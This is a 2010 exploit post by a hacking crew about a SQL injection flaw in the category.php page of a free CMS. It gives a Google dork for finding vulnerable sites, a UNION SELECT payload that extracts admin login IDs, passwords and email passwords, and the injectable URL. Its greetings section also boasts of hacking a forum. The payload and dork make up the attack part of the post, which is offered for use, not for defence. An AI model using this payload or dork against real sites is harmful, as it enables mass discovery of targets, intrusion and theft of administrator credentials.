-----------------------------------------------------------------------
 CmS (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author      : spykit
Site        : http://devilzc0de.org/
Date    : April, 22-2010
Location    : Jakarta, Indonesia
Time Zone    : GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application    : CmS
Vendor      : http://hotsweb.com
Price    : free
Version     : version 5.0
Google Dork: allinurl: Category.php?IndustrYID=
---------------------------------------------------------------

Exploitz:
~~~~~~~

union all  select
1,2,concat_ws(0x3a,LoginID,Password,AdminEmail,AdminEmailPassword) from
admin--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/category.php?IndustryID=[SQLI]
----------------------------------------------------------------

Shoutz:
~~~~

- 'oH lawd !! Malingsial lame forum g0t hacked for second times by
Us,lulz...'
-
LeQhi,lingah,GheMaX,v3n0m,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR,xtr0nic,adwisatya, and all member crew devilzc0de...
-hendri_note: jgn suka ngambek kang malu sama umur.. bruakkakaka
- #devilzc0de @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

spykit | devilzc0de CREW | daniel_sapuleka@yahoo.com
Homepage: http://devilzc0de.org

---------------------------[EOF]--------------------------------